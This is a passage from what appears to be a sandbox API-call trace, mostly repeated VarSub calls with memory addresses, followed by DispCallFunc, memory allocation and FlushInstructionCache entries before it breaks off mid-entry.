pvarResult=0x6b7b368) returned 0x0 [0042.175] VarSub (in: pvarLeft=0x6b7b240, pvarRight=0x6b7b2a0, pvarResult=0x6b7b288 | out: pvarResult=0x6b7b288) returned 0x0 [0042.175] VarSub (in: pvarLeft=0x6b7b160, pvarRight=0x6b7b1c0, pvarResult=0x6b7b1a8 | out: pvarResult=0x6b7b1a8) returned 0x0 [0042.175] VarSub (in: pvarLeft=0x6b7b080, pvarRight=0x6b7b0e0, pvarResult=0x6b7b0c8 | out: pvarResult=0x6b7b0c8) returned 0x0 [0042.175] VarSub (in: pvarLeft=0x6b7afa0, pvarRight=0x6b7b000, pvarResult=0x6b7afe8 | out: pvarResult=0x6b7afe8) returned 0x0 [0042.175] VarSub (in: pvarLeft=0x6b7aec0, pvarRight=0x6b7af20, pvarResult=0x6b7af08 | out: pvarResult=0x6b7af08) returned 0x0 [0042.175] VarSub (in: pvarLeft=0x6b7ade0, pvarRight=0x6b7ae40, pvarResult=0x6b7ae28 | out: pvarResult=0x6b7ae28) returned 0x0 [0042.175] VarSub (in: pvarLeft=0x6b7ad00, pvarRight=0x6b7ad60, pvarResult=0x6b7ad48 | out: pvarResult=0x6b7ad48) returned 0x0 [0042.175] VarSub (in: pvarLeft=0x6b7ac20, pvarRight=0x6b7ac80, pvarResult=0x6b7ac68 | out: pvarResult=0x6b7ac68) returned 0x0 [0042.175] VarSub (in: pvarLeft=0x6b7ab40, pvarRight=0x6b7aba0, pvarResult=0x6b7ab88 | out: pvarResult=0x6b7ab88) returned 0x0 [0042.176] VarSub (in: pvarLeft=0x6b7aa60, pvarRight=0x6b7aac0, pvarResult=0x6b7aaa8 | out: pvarResult=0x6b7aaa8) returned 0x0 [0042.176] VarSub (in: pvarLeft=0x6b7a980, pvarRight=0x6b7a9e0, pvarResult=0x6b7a9c8 | out: pvarResult=0x6b7a9c8) returned 0x0 [0042.176] VarSub (in: pvarLeft=0x6b7a8a0, pvarRight=0x6b7a900, pvarResult=0x6b7a8e8 | out: pvarResult=0x6b7a8e8) returned 0x0 [0042.176] VarSub (in: pvarLeft=0x6b7a7c0, pvarRight=0x6b7a820, pvarResult=0x6b7a808 | out: pvarResult=0x6b7a808) returned 0x0 [0042.176] VarSub (in: pvarLeft=0x6b7a6e0, pvarRight=0x6b7a740, pvarResult=0x6b7a728 | out: pvarResult=0x6b7a728) returned 0x0 [0042.177] VarSub (in: pvarLeft=0x6b7a600, pvarRight=0x6b7a660, pvarResult=0x6b7a648 | out: pvarResult=0x6b7a648) returned 0x0 [0042.177] VarSub (in: pvarLeft=0x6b7a520, pvarRight=0x6b7a580, pvarResult=0x6b7a568 | out: pvarResult=0x6b7a568) returned 0x0 [0042.177] VarSub (in: pvarLeft=0x6b7a440, pvarRight=0x6b7a4a0, pvarResult=0x6b7a488 | out: pvarResult=0x6b7a488) returned 0x0 [0042.177] VarSub (in: pvarLeft=0x6b7a360, pvarRight=0x6b7a3c0, pvarResult=0x6b7a3a8 | out: pvarResult=0x6b7a3a8) returned 0x0 [0042.177] VarSub (in: pvarLeft=0x6b7a280, pvarRight=0x6b7a2e0, pvarResult=0x6b7a2c8 | out: pvarResult=0x6b7a2c8) returned 0x0 [0042.177] VarSub (in: pvarLeft=0x6b7a1a0, pvarRight=0x6b7a200, pvarResult=0x6b7a1e8 | out: pvarResult=0x6b7a1e8) returned 0x0 [0042.178] VarSub (in: pvarLeft=0x6b7a0c0, pvarRight=0x6b7a120, pvarResult=0x6b7a108 | out: pvarResult=0x6b7a108) returned 0x0 [0042.178] VarSub (in: pvarLeft=0x6b79fe0, pvarRight=0x6b7a040, pvarResult=0x6b7a028 | out: pvarResult=0x6b7a028) returned 0x0 [0042.178] VarSub (in: pvarLeft=0x6b79f00, pvarRight=0x6b79f60, pvarResult=0x6b79f48 | out: pvarResult=0x6b79f48) returned 0x0 [0042.178] VarSub (in: pvarLeft=0x6b79e20, pvarRight=0x6b79e80, pvarResult=0x6b79e68 | out: pvarResult=0x6b79e68) returned 0x0 [0042.178] VarSub (in: pvarLeft=0x6b79d40, pvarRight=0x6b79da0, pvarResult=0x6b79d88 | out: pvarResult=0x6b79d88) returned 0x0 [0042.178] VarSub (in: pvarLeft=0x6b79c60, pvarRight=0x6b79cc0, pvarResult=0x6b79ca8 | out: pvarResult=0x6b79ca8) returned 0x0 [0042.178] VarSub (in: pvarLeft=0x6b79b80, pvarRight=0x6b79be0, pvarResult=0x6b79bc8 | out: pvarResult=0x6b79bc8) returned 0x0 [0042.178] VarSub (in: pvarLeft=0x6b79aa0, pvarRight=0x6b79b00, pvarResult=0x6b79ae8 | out: pvarResult=0x6b79ae8) returned 0x0 [0042.179] VarSub (in: pvarLeft=0x6b799c0, pvarRight=0x6b79a20, pvarResult=0x6b79a08 | out: pvarResult=0x6b79a08) returned 0x0 [0042.179] VarSub (in: pvarLeft=0x6b798e0, pvarRight=0x6b79940, pvarResult=0x6b79928 | out: pvarResult=0x6b79928) returned 0x0 [0042.179] VarSub (in: pvarLeft=0x6b79800, pvarRight=0x6b79860, pvarResult=0x6b79848 | out: pvarResult=0x6b79848) returned 0x0 [0042.179] VarSub (in: pvarLeft=0x6b79720, pvarRight=0x6b79780, pvarResult=0x6b79768 | out: pvarResult=0x6b79768) returned 0x0 [0042.179] VarSub (in: pvarLeft=0x6b79640, pvarRight=0x6b796a0, pvarResult=0x6b79688 | out: pvarResult=0x6b79688) returned 0x0 [0042.180] VarSub (in: pvarLeft=0x6b79560, pvarRight=0x6b795c0, pvarResult=0x6b795a8 | out: pvarResult=0x6b795a8) returned 0x0 [0042.180] VarSub (in: pvarLeft=0x6b79480, pvarRight=0x6b794e0, pvarResult=0x6b794c8 | out: pvarResult=0x6b794c8) returned 0x0 [0042.180] VarSub (in: pvarLeft=0x6b793a0, pvarRight=0x6b79400, pvarResult=0x6b793e8 | out: pvarResult=0x6b793e8) returned 0x0 [0042.180] VarSub (in: pvarLeft=0x6b792c0, pvarRight=0x6b79320, pvarResult=0x6b79308 | out: pvarResult=0x6b79308) returned 0x0 [0042.180] VarSub (in: pvarLeft=0x6b791e0, pvarRight=0x6b79240, pvarResult=0x6b79228 | out: pvarResult=0x6b79228) returned 0x0 [0042.180] VarSub (in: pvarLeft=0x6b79100, pvarRight=0x6b79160, pvarResult=0x6b79148 | out: pvarResult=0x6b79148) returned 0x0 [0042.180] VarSub (in: pvarLeft=0x6b79020, pvarRight=0x6b79080, pvarResult=0x6b79068 | out: pvarResult=0x6b79068) returned 0x0 [0042.181] VarSub (in: pvarLeft=0x6b78f40, pvarRight=0x6b78fa0, pvarResult=0x6b78f88 | out: pvarResult=0x6b78f88) returned 0x0 [0042.181] VarSub (in: pvarLeft=0x6b78e60, pvarRight=0x6b78ec0, pvarResult=0x6b78ea8 | out: pvarResult=0x6b78ea8) returned 0x0 [0042.181] VarSub (in: pvarLeft=0x6b78d80, pvarRight=0x6b78de0, pvarResult=0x6b78dc8 | out: pvarResult=0x6b78dc8) returned 0x0 [0042.181] VarSub (in: pvarLeft=0x6b78ca0, pvarRight=0x6b78d00, pvarResult=0x6b78ce8 | out: pvarResult=0x6b78ce8) returned 0x0 [0042.181] VarSub (in: pvarLeft=0x6b78bc0, pvarRight=0x6b78c20, pvarResult=0x6b78c08 | out: pvarResult=0x6b78c08) returned 0x0 [0042.182] VarSub (in: pvarLeft=0x6b78ae0, pvarRight=0x6b78b40, pvarResult=0x6b78b28 | out: pvarResult=0x6b78b28) returned 0x0 [0042.182] VarSub (in: pvarLeft=0x6b78a00, pvarRight=0x6b78a60, pvarResult=0x6b78a48 | out: pvarResult=0x6b78a48) returned 0x0 [0042.182] VarSub (in: pvarLeft=0x6b78920, pvarRight=0x6b78980, pvarResult=0x6b78968 | out: pvarResult=0x6b78968) returned 0x0 [0042.182] VarSub (in: pvarLeft=0x6b78840, pvarRight=0x6b788a0, pvarResult=0x6b78888 | out: pvarResult=0x6b78888) returned 0x0 [0042.182] VarSub (in: pvarLeft=0x6b78760, pvarRight=0x6b787c0, pvarResult=0x6b787a8 | out: pvarResult=0x6b787a8) returned 0x0 [0042.182] VarSub (in: pvarLeft=0x6b78680, pvarRight=0x6b786e0, pvarResult=0x6b786c8 | out: pvarResult=0x6b786c8) returned 0x0 [0042.182] VarSub (in: pvarLeft=0x6b785a0, pvarRight=0x6b78600, pvarResult=0x6b785e8 | out: pvarResult=0x6b785e8) returned 0x0 [0042.182] VarSub (in: pvarLeft=0x6b784c0, pvarRight=0x6b78520, pvarResult=0x6b78508 | out: pvarResult=0x6b78508) returned 0x0 [0042.183] VarSub (in: pvarLeft=0x6b783e0, pvarRight=0x6b78440, pvarResult=0x6b78428 | out: pvarResult=0x6b78428) returned 0x0 [0042.183] VarSub (in: pvarLeft=0x6b78300, pvarRight=0x6b78360, pvarResult=0x6b78348 | out: pvarResult=0x6b78348) returned 0x0 [0042.183] VarSub (in: pvarLeft=0x6b78220, pvarRight=0x6b78280, pvarResult=0x6b78268 | out: pvarResult=0x6b78268) returned 0x0 [0042.183] VarSub (in: pvarLeft=0x6b78140, pvarRight=0x6b781a0, pvarResult=0x6b78188 | out: pvarResult=0x6b78188) returned 0x0 [0042.183] VarSub (in: pvarLeft=0x6b78060, pvarRight=0x6b780c0, pvarResult=0x6b780a8 | out: pvarResult=0x6b780a8) returned 0x0 [0042.183] VarSub (in: pvarLeft=0x6b77f80, pvarRight=0x6b77fe0, pvarResult=0x6b77fc8 | out: pvarResult=0x6b77fc8) returned 0x0 [0042.184] VarSub (in: pvarLeft=0x6b77ea0, pvarRight=0x6b77f00, pvarResult=0x6b77ee8 | out: pvarResult=0x6b77ee8) returned 0x0 [0042.184] VarSub (in: pvarLeft=0x6b77dc0, pvarRight=0x6b77e20, pvarResult=0x6b77e08 | out: pvarResult=0x6b77e08) returned 0x0 [0042.184] VarSub (in: pvarLeft=0x6b77ce0, pvarRight=0x6b77d40, pvarResult=0x6b77d28 | out: pvarResult=0x6b77d28) returned 0x0 [0042.184] VarSub (in: pvarLeft=0x6b77c00, pvarRight=0x6b77c60, pvarResult=0x6b77c48 | out: pvarResult=0x6b77c48) returned 0x0 [0042.184] VarSub (in: pvarLeft=0x6b77b20, pvarRight=0x6b77b80, pvarResult=0x6b77b68 | out: pvarResult=0x6b77b68) returned 0x0 [0042.185] VarSub (in: pvarLeft=0x6b77a40, pvarRight=0x6b77aa0, pvarResult=0x6b77a88 | out: pvarResult=0x6b77a88) returned 0x0 [0042.185] VarSub (in: pvarLeft=0x6b77960, pvarRight=0x6b779c0, pvarResult=0x6b779a8 | out: pvarResult=0x6b779a8) returned 0x0 [0042.185] VarSub (in: pvarLeft=0x6b77880, pvarRight=0x6b778e0, pvarResult=0x6b778c8 | out: pvarResult=0x6b778c8) returned 0x0 [0042.185] VarSub (in: pvarLeft=0x6b777a0, pvarRight=0x6b77800, pvarResult=0x6b777e8 | out: pvarResult=0x6b777e8) returned 0x0 [0042.186] VarSub (in: pvarLeft=0x6b776c0, pvarRight=0x6b77720, pvarResult=0x6b77708 | out: pvarResult=0x6b77708) returned 0x0 [0042.186] VarSub (in: pvarLeft=0x6b775e0, pvarRight=0x6b77640, pvarResult=0x6b77628 | out: pvarResult=0x6b77628) returned 0x0 [0042.186] VarSub (in: pvarLeft=0x6b77500, pvarRight=0x6b77560, pvarResult=0x6b77548 | out: pvarResult=0x6b77548) returned 0x0 [0042.186] VarSub (in: pvarLeft=0x6b77420, pvarRight=0x6b77480, pvarResult=0x6b77468 | out: pvarResult=0x6b77468) returned 0x0 [0042.186] VarSub (in: pvarLeft=0x6b77340, pvarRight=0x6b773a0, pvarResult=0x6b77388 | out: pvarResult=0x6b77388) returned 0x0 [0042.186] VarSub (in: pvarLeft=0x6b77260, pvarRight=0x6b772c0, pvarResult=0x6b772a8 | out: pvarResult=0x6b772a8) returned 0x0 [0042.186] VarSub (in: pvarLeft=0x6b77180, pvarRight=0x6b771e0, pvarResult=0x6b771c8 | out: pvarResult=0x6b771c8) returned 0x0 [0042.187] VarSub (in: pvarLeft=0x6b770a0, pvarRight=0x6b77100, pvarResult=0x6b770e8 | out: pvarResult=0x6b770e8) returned 0x0 [0042.187] VarSub (in: pvarLeft=0x6b76fc0, pvarRight=0x6b77020, pvarResult=0x6b77008 | out: pvarResult=0x6b77008) returned 0x0 [0042.187] VarSub (in: pvarLeft=0x6b76ee0, pvarRight=0x6b76f40, pvarResult=0x6b76f28 | out: pvarResult=0x6b76f28) returned 0x0 [0042.187] VarSub (in: pvarLeft=0x6b76e00, pvarRight=0x6b76e60, pvarResult=0x6b76e48 | out: pvarResult=0x6b76e48) returned 0x0 [0042.187] VarSub (in: pvarLeft=0x6b76d20, pvarRight=0x6b76d80, pvarResult=0x6b76d68 | out: pvarResult=0x6b76d68) returned 0x0 [0042.187] VarSub (in: pvarLeft=0x6b76c40, pvarRight=0x6b76ca0, pvarResult=0x6b76c88 | out: pvarResult=0x6b76c88) returned 0x0 [0042.187] VarSub (in: pvarLeft=0x6b76b60, pvarRight=0x6b76bc0, pvarResult=0x6b76ba8 | out: pvarResult=0x6b76ba8) returned 0x0 [0042.188] VarSub (in: pvarLeft=0x6b76a80, pvarRight=0x6b76ae0, pvarResult=0x6b76ac8 | out: pvarResult=0x6b76ac8) returned 0x0 [0042.188] VarSub (in: pvarLeft=0x6b769a0, pvarRight=0x6b76a00, pvarResult=0x6b769e8 | out: pvarResult=0x6b769e8) returned 0x0 [0042.188] VarSub (in: pvarLeft=0x6b768c0, pvarRight=0x6b76920, pvarResult=0x6b76908 | out: pvarResult=0x6b76908) returned 0x0 [0042.188] VarSub (in: pvarLeft=0x6b767e0, pvarRight=0x6b76840, pvarResult=0x6b76828 | out: pvarResult=0x6b76828) returned 0x0 [0042.188] VarSub (in: pvarLeft=0x6b76700, pvarRight=0x6b76760, pvarResult=0x6b76748 | out: pvarResult=0x6b76748) returned 0x0 [0042.188] VarSub (in: pvarLeft=0x6b76620, pvarRight=0x6b76680, pvarResult=0x6b76668 | out: pvarResult=0x6b76668) returned 0x0 [0042.188] VarSub (in: pvarLeft=0x6b76540, pvarRight=0x6b765a0, pvarResult=0x6b76588 | out: pvarResult=0x6b76588) returned 0x0 [0042.189] VarSub (in: pvarLeft=0x6b76460, pvarRight=0x6b764c0, pvarResult=0x6b764a8 | out: pvarResult=0x6b764a8) returned 0x0 [0042.189] VarSub (in: pvarLeft=0x6b76380, pvarRight=0x6b763e0, pvarResult=0x6b763c8 | out: pvarResult=0x6b763c8) returned 0x0 [0042.189] VarSub (in: pvarLeft=0x6b762a0, pvarRight=0x6b76300, pvarResult=0x6b762e8 | out: pvarResult=0x6b762e8) returned 0x0 [0042.189] VarSub (in: pvarLeft=0x6b761c0, pvarRight=0x6b76220, pvarResult=0x6b76208 | out: pvarResult=0x6b76208) returned 0x0 [0042.189] VarSub (in: pvarLeft=0x6b760e0, pvarRight=0x6b76140, pvarResult=0x6b76128 | out: pvarResult=0x6b76128) returned 0x0 [0042.190] VarSub (in: pvarLeft=0x6b76000, pvarRight=0x6b76060, pvarResult=0x6b76048 | out: pvarResult=0x6b76048) returned 0x0 [0042.190] VarSub (in: pvarLeft=0x6b75f20, pvarRight=0x6b75f80, pvarResult=0x6b75f68 | out: pvarResult=0x6b75f68) returned 0x0 [0042.190] VarSub (in: pvarLeft=0x6b75e40, pvarRight=0x6b75ea0, pvarResult=0x6b75e88 | out: pvarResult=0x6b75e88) returned 0x0 [0042.190] VarSub (in: pvarLeft=0x6b75d60, pvarRight=0x6b75dc0, pvarResult=0x6b75da8 | out: pvarResult=0x6b75da8) returned 0x0 [0042.190] VarSub (in: pvarLeft=0x6b75c80, pvarRight=0x6b75ce0, pvarResult=0x6b75cc8 | out: pvarResult=0x6b75cc8) returned 0x0 [0042.190] VarSub (in: pvarLeft=0x6b75ba0, pvarRight=0x6b75c00, pvarResult=0x6b75be8 | out: pvarResult=0x6b75be8) returned 0x0 [0042.190] VarSub (in: pvarLeft=0x6b75ac0, pvarRight=0x6b75b20, pvarResult=0x6b75b08 | out: pvarResult=0x6b75b08) returned 0x0 [0042.190] VarSub (in: pvarLeft=0x6b759e0, pvarRight=0x6b75a40, pvarResult=0x6b75a28 | out: pvarResult=0x6b75a28) returned 0x0 [0042.190] VarSub (in: pvarLeft=0x6b75900, pvarRight=0x6b75960, pvarResult=0x6b75948 | out: pvarResult=0x6b75948) returned 0x0 [0042.191] VarSub (in: pvarLeft=0x6b75820, pvarRight=0x6b75880, pvarResult=0x6b75868 | out: pvarResult=0x6b75868) returned 0x0 [0042.191] VarSub (in: pvarLeft=0x6b75740, pvarRight=0x6b757a0, pvarResult=0x6b75788 | out: pvarResult=0x6b75788) returned 0x0 [0042.191] VarSub (in: pvarLeft=0x6b75660, pvarRight=0x6b756c0, pvarResult=0x6b756a8 | out: pvarResult=0x6b756a8) returned 0x0 [0042.191] VarSub (in: pvarLeft=0x6b75580, pvarRight=0x6b755e0, pvarResult=0x6b755c8 | out: pvarResult=0x6b755c8) returned 0x0 [0042.191] VarSub (in: pvarLeft=0x6b754a0, pvarRight=0x6b75500, pvarResult=0x6b754e8 | out: pvarResult=0x6b754e8) returned 0x0 [0042.191] VarSub (in: pvarLeft=0x6b753c0, pvarRight=0x6b75420, pvarResult=0x6b75408 | out: pvarResult=0x6b75408) returned 0x0 [0042.192] VarSub (in: pvarLeft=0x6b752e0, pvarRight=0x6b75340, pvarResult=0x6b75328 | out: pvarResult=0x6b75328) returned 0x0 [0042.192] VarSub (in: pvarLeft=0x6b75200, pvarRight=0x6b75260, pvarResult=0x6b75248 | out: pvarResult=0x6b75248) returned 0x0 [0042.192] VarSub (in: pvarLeft=0x6b75120, pvarRight=0x6b75180, pvarResult=0x6b75168 | out: pvarResult=0x6b75168) returned 0x0 [0042.192] VarSub (in: pvarLeft=0x6b75040, pvarRight=0x6b750a0, pvarResult=0x6b75088 | out: pvarResult=0x6b75088) returned 0x0 [0042.192] VarSub (in: pvarLeft=0x6b74f60, pvarRight=0x6b74fc0, pvarResult=0x6b74fa8 | out: pvarResult=0x6b74fa8) returned 0x0 [0042.192] VarSub (in: pvarLeft=0x6b74e80, pvarRight=0x6b74ee0, pvarResult=0x6b74ec8 | out: pvarResult=0x6b74ec8) returned 0x0 [0042.192] VarSub (in: pvarLeft=0x6b74da0, pvarRight=0x6b74e00, pvarResult=0x6b74de8 | out: pvarResult=0x6b74de8) returned 0x0 [0042.193] VarSub (in: pvarLeft=0x6b74cc0, pvarRight=0x6b74d20, pvarResult=0x6b74d08 | out: pvarResult=0x6b74d08) returned 0x0 [0042.193] VarSub (in: pvarLeft=0x6b74be0, pvarRight=0x6b74c40, pvarResult=0x6b74c28 | out: pvarResult=0x6b74c28) returned 0x0 [0042.193] VarSub (in: pvarLeft=0x6b74b00, pvarRight=0x6b74b60, pvarResult=0x6b74b48 | out: pvarResult=0x6b74b48) returned 0x0 [0042.193] VarSub (in: pvarLeft=0x6b74a20, pvarRight=0x6b74a80, pvarResult=0x6b74a68 | out: pvarResult=0x6b74a68) returned 0x0 [0042.193] VarSub (in: pvarLeft=0x6b74940, pvarRight=0x6b749a0, pvarResult=0x6b74988 | out: pvarResult=0x6b74988) returned 0x0 [0042.193] VarSub (in: pvarLeft=0x6b74860, pvarRight=0x6b748c0, pvarResult=0x6b748a8 | out: pvarResult=0x6b748a8) returned 0x0 [0042.193] VarSub (in: pvarLeft=0x6b74780, pvarRight=0x6b747e0, pvarResult=0x6b747c8 | out: pvarResult=0x6b747c8) returned 0x0 [0042.194] VarSub (in: pvarLeft=0x6b746a0, pvarRight=0x6b74700, pvarResult=0x6b746e8 | out: pvarResult=0x6b746e8) returned 0x0 [0042.194] VarSub (in: pvarLeft=0x6b745c0, pvarRight=0x6b74620, pvarResult=0x6b74608 | out: pvarResult=0x6b74608) returned 0x0 [0042.194] VarSub (in: pvarLeft=0x6b744e0, pvarRight=0x6b74540, pvarResult=0x6b74528 | out: pvarResult=0x6b74528) returned 0x0 [0042.194] VarSub (in: pvarLeft=0x6b74400, pvarRight=0x6b74460, pvarResult=0x6b74448 | out: pvarResult=0x6b74448) returned 0x0 [0042.194] VarSub (in: pvarLeft=0x6b74320, pvarRight=0x6b74380, pvarResult=0x6b74368 | out: pvarResult=0x6b74368) returned 0x0 [0042.195] VarSub (in: pvarLeft=0x6b74240, pvarRight=0x6b742a0, pvarResult=0x6b74288 | out: pvarResult=0x6b74288) returned 0x0 [0042.195] VarSub (in: pvarLeft=0x6b74160, pvarRight=0x6b741c0, pvarResult=0x6b741a8 | out: pvarResult=0x6b741a8) returned 0x0 [0042.195] VarSub (in: pvarLeft=0x6b74080, pvarRight=0x6b740e0, pvarResult=0x6b740c8 | out: pvarResult=0x6b740c8) returned 0x0 [0042.195] VarSub (in: pvarLeft=0x6b73fa0, pvarRight=0x6b74000, pvarResult=0x6b73fe8 | out: pvarResult=0x6b73fe8) returned 0x0 [0042.195] VarSub (in: pvarLeft=0x6b73ec0, pvarRight=0x6b73f20, pvarResult=0x6b73f08 | out: pvarResult=0x6b73f08) returned 0x0 [0042.195] VarSub (in: pvarLeft=0x6b73de0, pvarRight=0x6b73e40, pvarResult=0x6b73e28 | out: pvarResult=0x6b73e28) returned 0x0 [0042.195] VarSub (in: pvarLeft=0x6b73d00, pvarRight=0x6b73d60, pvarResult=0x6b73d48 | out: pvarResult=0x6b73d48) returned 0x0 [0042.196] VarSub (in: pvarLeft=0x6b73c20, pvarRight=0x6b73c80, pvarResult=0x6b73c68 | out: pvarResult=0x6b73c68) returned 0x0 [0042.196] VarSub (in: pvarLeft=0x6b73b40, pvarRight=0x6b73ba0, pvarResult=0x6b73b88 | out: pvarResult=0x6b73b88) returned 0x0 [0042.196] VarSub (in: pvarLeft=0x6b73a60, pvarRight=0x6b73ac0, pvarResult=0x6b73aa8 | out: pvarResult=0x6b73aa8) returned 0x0 [0042.196] VarSub (in: pvarLeft=0x6b73980, pvarRight=0x6b739e0, pvarResult=0x6b739c8 | out: pvarResult=0x6b739c8) returned 0x0 [0042.196] VarSub (in: pvarLeft=0x6b738a0, pvarRight=0x6b73900, pvarResult=0x6b738e8 | out: pvarResult=0x6b738e8) returned 0x0 [0042.196] VarSub (in: pvarLeft=0x6b737c0, pvarRight=0x6b73820, pvarResult=0x6b73808 | out: pvarResult=0x6b73808) returned 0x0 [0042.197] VarSub (in: pvarLeft=0x6b736e0, pvarRight=0x6b73740, pvarResult=0x6b73728 | out: pvarResult=0x6b73728) returned 0x0 [0042.197] VarSub (in: pvarLeft=0x6b73600, pvarRight=0x6b73660, pvarResult=0x6b73648 | out: pvarResult=0x6b73648) returned 0x0 [0042.197] VarSub (in: pvarLeft=0x6b73520, pvarRight=0x6b73580, pvarResult=0x6b73568 | out: pvarResult=0x6b73568) returned 0x0 [0042.197] VarSub (in: pvarLeft=0x6b73440, pvarRight=0x6b734a0, pvarResult=0x6b73488 | out: pvarResult=0x6b73488) returned 0x0 [0042.197] VarSub (in: pvarLeft=0x6b73360, pvarRight=0x6b733c0, pvarResult=0x6b733a8 | out: pvarResult=0x6b733a8) returned 0x0 [0042.198] VarSub (in: pvarLeft=0x6b73280, pvarRight=0x6b732e0, pvarResult=0x6b732c8 | out: pvarResult=0x6b732c8) returned 0x0 [0042.198] VarSub (in: pvarLeft=0x6b731a0, pvarRight=0x6b73200, pvarResult=0x6b731e8 | out: pvarResult=0x6b731e8) returned 0x0 [0042.198] VarSub (in: pvarLeft=0x6b730c0, pvarRight=0x6b73120, pvarResult=0x6b73108 | out: pvarResult=0x6b73108) returned 0x0 [0042.198] VarSub (in: pvarLeft=0x6b72fe0, pvarRight=0x6b73040, pvarResult=0x6b73028 | out: pvarResult=0x6b73028) returned 0x0 [0042.198] VarSub (in: pvarLeft=0x6b72f00, pvarRight=0x6b72f60, pvarResult=0x6b72f48 | out: pvarResult=0x6b72f48) returned 0x0 [0042.198] VarSub (in: pvarLeft=0x6b72e20, pvarRight=0x6b72e80, pvarResult=0x6b72e68 | out: pvarResult=0x6b72e68) returned 0x0 [0042.199] VarSub (in: pvarLeft=0x6b72d40, pvarRight=0x6b72da0, pvarResult=0x6b72d88 | out: pvarResult=0x6b72d88) returned 0x0 [0042.199] VarSub (in: pvarLeft=0x6b72c60, pvarRight=0x6b72cc0, pvarResult=0x6b72ca8 | out: pvarResult=0x6b72ca8) returned 0x0 [0042.199] VarSub (in: pvarLeft=0x6b72b80, pvarRight=0x6b72be0, pvarResult=0x6b72bc8 | out: pvarResult=0x6b72bc8) returned 0x0 [0042.199] VarSub (in: pvarLeft=0x6b72aa0, pvarRight=0x6b72b00, pvarResult=0x6b72ae8 | out: pvarResult=0x6b72ae8) returned 0x0 [0042.200] VarSub (in: pvarLeft=0x6b729c0, pvarRight=0x6b72a20, pvarResult=0x6b72a08 | out: pvarResult=0x6b72a08) returned 0x0 [0042.200] VarSub (in: pvarLeft=0x6b728e0, pvarRight=0x6b72940, pvarResult=0x6b72928 | out: pvarResult=0x6b72928) returned 0x0 [0042.200] VarSub (in: pvarLeft=0x6b72800, pvarRight=0x6b72860, pvarResult=0x6b72848 | out: pvarResult=0x6b72848) returned 0x0 [0042.201] VarSub (in: pvarLeft=0x6b72720, pvarRight=0x6b72780, pvarResult=0x6b72768 | out: pvarResult=0x6b72768) returned 0x0 [0042.201] VarSub (in: pvarLeft=0x6b72640, pvarRight=0x6b726a0, pvarResult=0x6b72688 | out: pvarResult=0x6b72688) returned 0x0 [0042.201] VarSub (in: pvarLeft=0x6b72560, pvarRight=0x6b725c0, pvarResult=0x6b725a8 | out: pvarResult=0x6b725a8) returned 0x0 [0042.202] VarSub (in: pvarLeft=0x6b72480, pvarRight=0x6b724e0, pvarResult=0x6b724c8 | out: pvarResult=0x6b724c8) returned 0x0 [0042.202] VarSub (in: pvarLeft=0x6b723a0, pvarRight=0x6b72400, pvarResult=0x6b723e8 | out: pvarResult=0x6b723e8) returned 0x0 [0042.202] VarSub (in: pvarLeft=0x6b722c0, pvarRight=0x6b72320, pvarResult=0x6b72308 | out: pvarResult=0x6b72308) returned 0x0 [0042.202] VarSub (in: pvarLeft=0x6b721e0, pvarRight=0x6b72240, pvarResult=0x6b72228 | out: pvarResult=0x6b72228) returned 0x0 [0042.202] VarSub (in: pvarLeft=0x6b72100, pvarRight=0x6b72160, pvarResult=0x6b72148 | out: pvarResult=0x6b72148) returned 0x0 [0042.203] VarSub (in: pvarLeft=0x6b72020, pvarRight=0x6b72080, pvarResult=0x6b72068 | out: pvarResult=0x6b72068) returned 0x0 [0042.203] VarSub (in: pvarLeft=0x6b71f40, pvarRight=0x6b71fa0, pvarResult=0x6b71f88 | out: pvarResult=0x6b71f88) returned 0x0 [0042.203] VarSub (in: pvarLeft=0x6b71e60, pvarRight=0x6b71ec0, pvarResult=0x6b71ea8 | out: pvarResult=0x6b71ea8) returned 0x0 [0042.203] VarSub (in: pvarLeft=0x6b71d80, pvarRight=0x6b71de0, pvarResult=0x6b71dc8 | out: pvarResult=0x6b71dc8) returned 0x0 [0042.203] VarSub (in: pvarLeft=0x6b71ca0, pvarRight=0x6b71d00, pvarResult=0x6b71ce8 | out: pvarResult=0x6b71ce8) returned 0x0 [0042.203] VarSub (in: pvarLeft=0x6b71bc0, pvarRight=0x6b71c20, pvarResult=0x6b71c08 | out: pvarResult=0x6b71c08) returned 0x0 [0042.203] VarSub (in: pvarLeft=0x6b71ae0, pvarRight=0x6b71b40, pvarResult=0x6b71b28 | out: pvarResult=0x6b71b28) returned 0x0 [0042.204] VarSub (in: pvarLeft=0x6b71a00, pvarRight=0x6b71a60, pvarResult=0x6b71a48 | out: pvarResult=0x6b71a48) returned 0x0 [0042.204] VarSub (in: pvarLeft=0x6b71920, pvarRight=0x6b71980, pvarResult=0x6b71968 | out: pvarResult=0x6b71968) returned 0x0 [0042.204] VarSub (in: pvarLeft=0x6b71840, pvarRight=0x6b718a0, pvarResult=0x6b71888 | out: pvarResult=0x6b71888) returned 0x0 [0042.204] VarSub (in: pvarLeft=0x6b71760, pvarRight=0x6b717c0, pvarResult=0x6b717a8 | out: pvarResult=0x6b717a8) returned 0x0 [0042.205] VarSub (in: pvarLeft=0x6b71680, pvarRight=0x6b716e0, pvarResult=0x6b716c8 | out: pvarResult=0x6b716c8) returned 0x0 [0042.205] VarSub (in: pvarLeft=0x6b715a0, pvarRight=0x6b71600, pvarResult=0x6b715e8 | out: pvarResult=0x6b715e8) returned 0x0 [0042.205] VarSub (in: pvarLeft=0x6b714c0, pvarRight=0x6b71520, pvarResult=0x6b71508 | out: pvarResult=0x6b71508) returned 0x0 [0042.205] VarSub (in: pvarLeft=0x6b713e0, pvarRight=0x6b71440, pvarResult=0x6b71428 | out: pvarResult=0x6b71428) returned 0x0 [0042.205] VarSub (in: pvarLeft=0x6b71300, pvarRight=0x6b71360, pvarResult=0x6b71348 | out: pvarResult=0x6b71348) returned 0x0 [0042.206] VarSub (in: pvarLeft=0x6b71220, pvarRight=0x6b71280, pvarResult=0x6b71268 | out: pvarResult=0x6b71268) returned 0x0 [0042.233] DispCallFunc (pvInstance=0x6c2d940, oVft=0x38, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x1834f0) [0042.233] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0x88) returned 0x6d34010 [0042.233] IMalloc:Free (This=0x7feffc15380, pv=0x6ccff10) [0042.233] GetCurrentProcess () returned 0xffffffffffffffff [0042.233] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc09, dwSize=0x8) returned 1 [0042.233] GetCurrentProcess () returned 0xffffffffffffffff [0042.233] FlushInstructionCache (hProcess=0xffffffffffffffff, 